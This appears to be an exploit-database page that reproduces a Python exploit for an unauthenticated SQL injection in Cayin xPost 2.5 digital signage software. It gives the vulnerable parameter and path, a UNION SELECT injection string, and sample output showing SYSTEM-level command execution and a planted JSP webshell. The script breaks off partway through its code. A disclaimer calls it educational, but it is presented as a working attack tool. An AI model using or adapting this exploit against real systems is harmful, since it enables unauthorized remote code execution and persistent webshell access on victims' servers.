Cayin digital signage system xpost 2.5 remote command injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-06-04 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Cayin digital signage system xpost 2.5 remote command injection is for educational purposes only and if it is used you will do on your own risk!
#!/usr/bin/env python3
#
#
# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: 2.5.18103
# 2.0
# 1.0
#
# Summary: CAYIN xPost is the web-based application software, which offers a
# combination of essential tools to create rich contents for digital signage in
# different vertical markets. It provides an easy-to-use platform for instant
# data entry and further extends the usage of CAYIN SMP players to meet users'
# requirements of frequent, daily maintenance.
#
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
# is not properly sanitised before being returned to the user or used in SQL queries.
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
# and execute SYSTEM commands.
#
# --------------------------------------------------------------------------------
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
# # Injecting...
# # Executing...
#
# Command: whoami
#
# nt authority\system
#
#
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
# lqwrm@zslab:~$
# --------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 10 Home
# Microsoft Windows 8.1
# Microsoft Windows Server 2016
# Microsoft Windows Server 2012
# Microsoft Windows 7 Ultimate SP1
# Apache Tomcat/9.0.1
# MySQL/5.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5571
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
#
#
# 15.05.2020
#
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
print("Usage: ./wayfinder.py ip:port")
sistemot.exit(19)
else:
ip = sistemot.argv[1]
filename = "thricer.jsp"
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
constr = "-251' UNION ALL SELECT "